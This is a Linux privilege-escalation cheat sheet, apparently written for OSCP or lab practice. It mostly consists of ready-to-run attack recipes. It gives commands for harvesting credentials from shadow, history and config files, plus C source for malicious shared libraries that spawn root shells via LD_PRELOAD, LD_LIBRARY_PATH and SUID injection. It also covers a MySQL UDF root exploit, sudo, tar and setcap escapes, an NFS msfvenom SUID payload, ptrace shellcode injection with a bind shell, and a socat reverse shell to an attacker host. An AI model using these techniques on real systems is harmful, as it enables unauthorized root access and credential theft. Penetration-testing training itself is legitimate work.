Linux Privilege Escalation

Target enumeration phase

finding os version and distribution type:

cat /etc/issue 
cat /etc/*-release

finding kernel version:

cat /proc/version 
uname -a

what can be learnt from the environment variables:

cat /etc/profile
cat /etc/bashrc
cat ~/.bashrc
env
set

what services running and which service has which user privilege:

ps aux
ps ef
top
cat /etc/services

what applications are installed and can we identify their version?are they running?

ls -alh /usr/bin
ls -alh /sbin/
dpkg -l
ls -alh /var/cache/apt/archivesO

among running services are there misconfigured services settings?

• google what is the services configuration named and search for known misconfigurations

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

what jobs are scheduled and by whom?

crontab -l
cat /etc/crontab
cat /var/spool/cron/crontabs/root
la -al /etc/cron*
cat /etc/cron*

Are there plain text usernames or passwords in config files,db files or other types of files ?

grep -i user filename
grep -i pass filename
grep -i password filename.conf

is the host connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

finding network configuration settings:

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

which other hosts/users are on the system?

last
w

which ports are open internally?

netstat -ano
netstat -antup
netstat -antpx
netstat -tulpn

port forwadring tools: chisel,ssh,socat

which user are you?in which groups are you?which other users are on the machine? who are on the sudoers group?

id
who
cat /etc/passwd
cat /etc/sudoers
sudo -l

what have the users been doing?what have they been editing?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

are there anything on the log files??

cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

are there other database files which are hidden?

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Any vulnerable softwares installed?

dpkg -l #Debian
rpm -qa #Centos

Finding mounted,unmounted, mounted at boot time or other file system drives(Imp for oscp)

mount
cat /etc/fstab

Find suid/sgid files:

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

Found interesting suid/suid binary? didnot find priv esc vector in gtfobins? use searchsploit to check for LPE.

Finding Writable Files and Directories

find / -writable -type d 2>/dev/null

Files owned by root but writable by everyone(eg: .conf file, newly learned technique)

find / -type f -user root -perm /o=w -not -path "/proc/*" 2>/dev/null

Suppose we find /etc/apache2/apache2.conf then we can modify the configuration for apache2 to run as another user, upload a php backdoor inside webroot then after rebooting the machine or restarting apache2 service, execute the backdoor from web to get code execution as that user. Discovered in Vulnhub: Torment.

Found compromised user as part of interesting group? Find files owned by that group

find / -group <group-name> 2>/dev/null

Finding files owned by particular user

find / -user <username> 2>/dev/null

Finding device drivers and related information

To find available device drivers

lsmod       

To find information related to specific device driver

/sbin/modinfo <driver-name>

Python library hijacking

https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/

Mysql running as root with no password set

if mysql is running as root and no password has been set for the service then we can take advantage of a popular exploit https://www.exploit-db.com/exploits/1518 this exploit takes advantage of user defined functions(UDFs) to run system commands as root via the MySQL service. download the raptor_udf2.c and compile using the following two commands:

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

connect to the mysql service with blank password

mysql -u root

create user defined functions using the following commands

use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

spawn root shell using

/tmp/rootbash -p

Weak file permission: Readable /etc/shadow

The etc/shadow file contains the password hash for all the users and is only readable and writable by the root user.If the shadow file is readable by the user we are on the machine we can grab the root user's hash which is between the first and second colon(:) and crack using john or hashcat. save the root user's hash which is between the first and second (:)colon and crack using john:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Weak file permission: Writable /etc/shadow

If the etc/shadow file is writable we can generate a hash of our chosen password in our local machine and replace the root user's hash which is between the first and second colon(:) with our generated hash then we can su root using the password we had chosen.

mkpasswd -m sha-512 newpasswordhere

Weak file permission: Writable /etc/passwd

The etc/passwd files contains information about user accounts.If it is writable by our user we can generate a hash of our chosen password and replace between the first and second colon(:) of the root user's row(replacing the "x") then we can su root using the password we had chosen. to generate passwd file hash: openssl passwd newpasswordhere

Alternatively we can copy the root user's row and append it to the bottom of the file changing the first instance of the word root to newroot and placing the generated password hash between the first and second colon (replacing the "x") then we can su newroot

Sudo Shell Escape Sequences

we do sudo -l to list the programs which sudo allows our user to run.Then we can search for interesting programs on gtfobins https://gtfobins.github.io ff the program is listed with "sudo" as a function, you can use it to elevate privileges, usually via an escape sequence.

• Note that we should always use full path for the programs like sudo /usr/sbin/iftop not sudo iftop

• Didnot find the binary in gtfobins? use searchsploit or search in exploit-db for LPE via that binary

Sudo shell escape sequence with privilege to run programs as another local user instead of root(zip case)

Suppose we are user alex and there is another local user binit in the system,after doing sudo -l as alex we see something like below

User alex may run the following commands on linuxagency:
    (binit) NOPASSWD: /usr/bin/zip

This means our user alex can run zip command inheriting the privilege of user binit so when we abuse such misconfiguration we always use sudo -u binit /usr/bin/zip like this instead of direct sudo /usr/bin/zip

TF=$(mktemp -u)
sudo -u binit /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
rm $TF

Since the zip command can be used with privilege of binit only we should abuse putting

sudo -u <username> /path/to/command.

Sudo Environment variables(LD_PRELOAD,LD_LIBRARY_PATH)

sudo can be configured to inherit certain environment variables from the user's environment. Check which environment variables are inherited by doing sudo -l and look for env_keep options.Suppose LD_PRELOAD and LD_LIBRARY_PATH environment variables are loaded from the user's environment. LD_PRELOAD: It loads a shared object before any others when a program is run. LD_LIBRARY_PATH: It provides list of directories where shared libraries are searched for first

Using LD_PRELOAD

suppose while doing sudo -l we find a program which is not listed on gtfobins but we see LD_PRELOAD in the environment variable.lets suppose apache2 we can set the apache2 program to load shell.so shared library before any other where shell.so being our malicious shared library.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

save it as shell.c inside tmp folder and now lets compile it to generate a shared object(.so)

gcc -fPIC -shared -nostartfiles shell.c -o /tmp/shell.so
ls -al shell.so
sudo LD_PRELOAD=/tmp/shell.so /usr/sbin/apache2
whoami
#root

Using LD_LIBRARY_PATH

suppose we see another program which is not listed on gtfobins while doing sudo -l.lets suppose apache2 itself but we see LD_LIBRARY_PATH environment variable inherited from user's environment.We can create a malicious shared object with the same name as one of the library the apache2 is using and place it in a writable directory lets say /tmp now when we when we run apache2 program setting the path to /tmp the program will first search for the shared library inside the /tmp folder and we can gain root shell.

To find shared library used by apache2: ldd /usr/sbin/apache2 there are many shared libraries used by apache2 one of them is libcrypt.so.1 lets create a malicious libcrypt.so.1 and place it inside /tmp folder

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
	unsetenv("LD_LIBRARY_PATH");
	setresuid(0,0,0);
	system("/bin/bash -p");
}

save it as library_path.c and lets compile it as a shared library with the name libcrypt.so.1

gcc -shared -fPIC library_path.c -o /tmp/libcrypt.so.1

lets run apache2 setting the library_path to /tmp since our malicious libcrypt.so.1 is inside tmp folder

 sudo LD_LIBRARY_PATH=/tmp apache2 

root shell will spawn!

Cron Jobs - File permissions

cronjobs are the programs or scripts which users can schedule to run at certain times or intervals.we can view the scheduled programs or scripts/tasks to run by viewing the crontab by doing

cat /etc/crontab

suppose we see a script named overwrite.sh setup by root user to run every minute we can find the path of the overwrite.sh script by doing locate overwrite.sh and doing ls -al /path/to/overwrite.sh if we see it is writable by our user we can replace the contents of overwrite.sh with a bash reverse shell and listen for connection on the specific port and after a minute we should have got a connection as the root user.

Cron Jobs - Path Environment variables

While viewing the sysem wide crontab

cat /etc/crontab 

suppose we see a script named haha.sh running as root and the full path is not set and we also see PATH environment variable like

PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

what this means is that when the cronjob runs first it will start searching the script from /home/user all the way upto /usr/bin and if we have writable permission on any one of the directory suppose /home/user we can create a malicious haha.sh with a bash reverse shell on /home/user give it executale permission and when the cronjob starts after a minute we get reverse shell as root user.

Tar-Wildcard

If we can run tar as sudo it has a command line options which lets us run other commands as a part of checkpoint feature.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

getcap CAP_SYS_PTRACE(on python binary) privilege escalation

suppose after doing

sbin/getcap -r / 2>/dev/null

we find /usr/nin/python2.7 binary with cap_sys_ptrace+ep. This capability grants the current user to attach to other process and trace their system calls. Therfore we can attach to root process and inject bind shell code to get privilege escalation as root.

• Download inject.py from https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities CAP_SYS_PTRACE section.

• Transfer the binary to victim host, the exploit injects bind tcp shellcode in given process, if success opens bind shell on port 5600

for i in $(ps -ef | grep root | awk -F " " {'print $2'}); do python2.7 inject.py $i; done nc -nv <ip-address> 5600

SUID/SGID executables-known exploits

SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner. SGID is a special file permission that also applies to executable files and enables other users to inherit the effective GID of file group owner.

To find all suid/sgid executables:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null 

If we see any executables with a version number suppose we find executable named exim-4.84-3 we can search the exploit related to this version on github,exploit-db,google and so on and gain administrative privilege.

SUID/SGID executables-shared object injections

suppose we find a suid/sgid program by doing same as above

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null 

and we find /usr/local/bin/hello we can run strace on it and grep for open/access calls and for "no such file" errors by doing:

strace /usr/local/bin/hello 2>&1 | grep -iE "open|access|no such file"

suppose the executable tries to load /home/user/.config/libcalc.so shared object within our home directory, but it cannot be found then since the /home/user is a writable directory by our user we can create a .config directory and inside it create a malicious libcalc.so file and when we run hello pogram we will get root shell. This is our malicious.c file lets compile it as shared object and put it inside /home/user/.config directory.

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
	setuid(0);
	system("/bin/bash -p");
}

gcc -shared -fPIC malicious.c -o /home/user/.config/libcalc.so 

running the hello executable gives us a root shell.

SUID/SGID executables environment variables abuse(case1)

suppose we find a suid/sgid executable and while running strings on it we find a line service apache2 start so we know it is trying to run apache2 service but the full path of the service is not provided which is /usr/sbin/service/apache2 we can create a malicious binary named service in a writable directory like /tmp and export that directory to PATH variable now when the suid/sgid executable is run it will first try loading the service binary from /tmp and we get root shell. the following is service.c now compile it as service binary.

int main() {
	setuid(0);
	system("/bin/bash -p");
}

gcc service.c -o /tmp/service

since the service apache2 start is provided without full path lets export /tmp folder to our path variable

export PATH=/tmp:$PATH 

upon running the suid/sgid binary we get root shell.

SUID/SGID executables PATH variable abuse(case2)

Suppose we find an out of ordinary suid/sgid binary after doing

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

After running that binary we see it just gives us output of ifconfig, whoami, ps literally any command in linux, since every command in linux is a binary itself. Lets suppose after running the binary it prints the hostname of the computer. After running strings on the binary we can see it is using hostname without full path if this is the case then we can simply create a file named hostname in /dev/shm or any world writable directory and put bash reverse shell inside the file then give chmod executable permission after that we can just do export PATH=/dev/shm:$PATH which will put the /dev/shm directory at first position of path variable. Now if we run that binary again since it is not using full path which is /usr/bin/hostname it will try to find hostname binary from /dev/shm first and execute our malicious hostname file with bash reverse shell inside it since the binary is a suid/sgid we will get a reverse shell connection as root.

SUID setcap exploitation

lets suppose we found /sbin/setcap binary with suid bit set, this means we use setcap binary to set capability on any other binary of our choice and perform privilege escalation.

cp /usr/bin/python3 /tmp/python3
/sbin/setcap cap_setuid+ep /tmp/python3
/tmp/python3 -c 'import os;os.setuid(0);os.system("/bin/bash");'

• If there is no python we may be able to set same capability on any other programming language available on system such as perl.

cp /usr/bin/perl /tmp/perl
/sbin/setcap cap_setuid+ep /tmp/perl
/tmp/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

• We can also set capability on cat,head,tail as follows to read sensative files

setcap cap_dac_override=ep /bin/cat
cat /etc/shadow

BASH VERSION < 4.2-048 (ABUSING SUID/SGID)

In bash version less than 4.2-048 it is possible to define bash function names that resembles file paths then export that function name so that it is used instead of any actual executable at that file path. for example we found a suid/sgid executable named nice at /usr/local/bin/nice running strings on it we found it is starting apache2 with absolute path /usr/sbin/service/apache2 but doing /bin/bash --version we found the version is 4.1. now we create a bash function as path to service and export it.

function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service

now if we run /usr/local/bin/nice in the same path where we created the bash function it will try starting the apache2 with the function we created and exported and we get root shell.

BASH VERSION < 4.4 (ABUSING SUID/SGID)

When in debugging mode in bash version less than or equal to 4.4 it uses the environment variable PS4 to display an extra prompt for debugging statements.suppose we find a suid/sgid executable /usr/local/bin/hehe and the bash version is less than or equal o 4.4 we can do the following to gain root shell.

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/hehe /tmp/rootbash -p

Password and keys-History files

if a user accidently types his/her password password in a command line instead of password prompt it may be be recorded in a history file. we can view the contents of all hidden history file by:

cat ~/.*history

NFS-no_root_squash

nfs means network file system protocal whih allows us to view/modify and update files on remote computer from his/her own local pc and if no_root_squash option is set we can mount the remote directory in our pc then we in our pc we can create a malicious shell which spawns /bin/bash -p and give it executable permission with suid bit set then we place the shell on the mounted folder in our host as root user and when we go to remote host's that folder we can see our shell with suid bit enabled and upon running it we get a root shell.

checking nfs share configration:

cat /etc/exports 

if we see no_root_squash option set on /tmp share now we can mount the /tmp to our local machine.

• switch to root user on local machine

on local machine as root user do the following

mkdir /tmp/nfs
mount -o rw,vers=2 ip-address:/tmp /tmp/nfs

generate a paylaod and place in /tmp/nfs of local machine itself since we mounted the remote directory to /tmp/nfs

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

give it executable permission with suid bit enabled:

chmod +xs /tmp/nfs/shell.elf

Now on the victim machine we will see shell.elf run it to gain root shell.

Socat fully interactive shell

attacking machine: sudo socat file:`tty`,raw,echo=0 tcp-listen:4444
victim machine: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:attacker-ip:4444

Polkit pkexec Vulnerability- CVE-2021-4034

CVE-2022-0847 Dirty Pipe exploit - linux kernel >= 5.8 (fixed in 5.16.11, 5.15.25 and 5.10.102.)

https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit

./dirtypipe /usr/bin/su

CVE-2022-0185 DirtyCred kernel privesc

• Case study: https://www.hackthebox.com/blog/CVE-2022-0185:_A_case_study
• poc for ubuntu making /bin/bash suid: https://github.com/Crusaders-of-Rust/CVE-2022-0185/